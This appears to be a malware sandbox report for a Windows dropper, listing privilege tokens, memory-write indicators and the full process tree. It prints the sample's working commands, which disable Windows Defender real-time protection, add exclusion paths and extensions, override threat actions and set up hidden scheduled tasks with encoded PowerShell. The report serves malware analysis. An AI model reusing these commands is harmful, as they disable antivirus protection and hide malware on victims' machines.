SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3012 WMIC.exe Token: SeIncreaseQuotaPrivilege 3012 WMIC.exe Token: SeSecurityPrivilege 3012 WMIC.exe Token: SeTakeOwnershipPrivilege 3012 WMIC.exe Token: SeLoadDriverPrivilege 3012 WMIC.exe Token: SeSystemtimePrivilege 3012 WMIC.exe Token: SeBackupPrivilege 3012 WMIC.exe Token: SeRestorePrivilege 3012 WMIC.exe Token: SeShutdownPrivilege 3012 WMIC.exe Token: SeSystemEnvironmentPrivilege 3012 WMIC.exe Token: SeUndockPrivilege 3012 WMIC.exe Token: SeManageVolumePrivilege 3012 WMIC.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1764 WMIC.exe Token: SeIncreaseQuotaPrivilege 1764 WMIC.exe Token: SeSecurityPrivilege 1764 WMIC.exe Token: SeTakeOwnershipPrivilege 1764 WMIC.exe Token: SeLoadDriverPrivilege 1764 WMIC.exe Token: SeSystemtimePrivilege 1764 WMIC.exe Token: SeBackupPrivilege 1764 WMIC.exe Token: SeRestorePrivilege 1764 WMIC.exe Token: SeShutdownPrivilege 1764 WMIC.exe Token: SeSystemEnvironmentPrivilege 1764 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 2972 wrote to memory of 1996 2972 599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe 28 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1996 wrote to memory of 1980 1996 Install.exe 29 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 1980 wrote to memory of 2524 1980 Install.exe 30 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2524 wrote to memory of 2504 2524 cmd.exe 32 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2504 wrote to memory of 2672 2504 forfiles.exe 33 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2672 wrote to memory of 2532 2672 cmd.exe 34 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2524 wrote to memory of 2684 2524 cmd.exe 35 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 2684 wrote to memory of 304 2684 forfiles.exe 36 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 304 wrote to memory of 2400 304 cmd.exe 37 PID 2524 wrote to memory of 2460 2524 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe"C:\Users\Admin\AppData\Local\Temp\599a8c2c177f0d468cb20ef6e6b2164914461ca2daa3a502ce5654ac06263497.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\7zS27EB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\7zS2F2B.tmp\Install.exe.\Install.exe /IfmudidezWGS "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2532
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:304 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2400
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2460
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2976
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2288
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2664
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2544
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2420
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2428
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2296
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2776
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:1684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bxFWqzBdxtvvQVHpdf" /SC once /ST 23:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv\SHbbKKMXUHFWXXL\qTTbifu.exe\" Ww /zeHdidEiSb 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1492
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bxFWqzBdxtvvQVHpdf"4⤵PID:2552
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bxFWqzBdxtvvQVHpdf5⤵PID:392
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bxFWqzBdxtvvQVHpdf6⤵PID:668
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 6044⤵
- Loads dropped DLL
- Program crash
PID:1860
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DDBF6F2D-3980-4D37-B313-FB91E2EED478} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:488
-
C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv\SHbbKKMXUHFWXXL\qTTbifu.exeC:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv\SHbbKKMXUHFWXXL\qTTbifu.exe Ww /zeHdidEiSb 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1160
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1692
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2412
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2956
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2940
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2932
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2140
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2928
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1416
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:632
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2248
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2204
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2024
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2240
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2244
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYJGNbffG" /SC once /ST 17:18:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYJGNbffG"3⤵PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYJGNbffG"3⤵PID:2020
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1520
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2068
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2280
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxudGYpJW" /SC once /ST 07:38:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxudGYpJW"3⤵PID:2964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxudGYpJW"3⤵PID:2448
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2568
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:323⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:643⤵PID:1176
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:323⤵PID:760
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:324⤵PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:643⤵PID:2716
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WVfXyuxDIVBpwENO" /t REG_DWORD /d 0 /reg:644⤵PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\WVfXyuxDIVBpwENO\tpjBEHFO\lPrgwPHFOfaabtgd.wsf"3⤵PID:2296
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\WVfXyuxDIVBpwENO\tpjBEHFO\lPrgwPHFOfaabtgd.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2876 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DxTzxYfmrcUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HgpwBMHPU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HgpwBMHPU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YlnHzqqXEaDDC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YlnHzqqXEaDDC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iEBFdPsJPxYkyqxDvdR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mEGqyDDrClrU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mEGqyDDrClrU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nbVAllIPPGDxfqVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nbVAllIPPGDxfqVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dpqkkcpFfSkFLMBpv" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:844
-
-
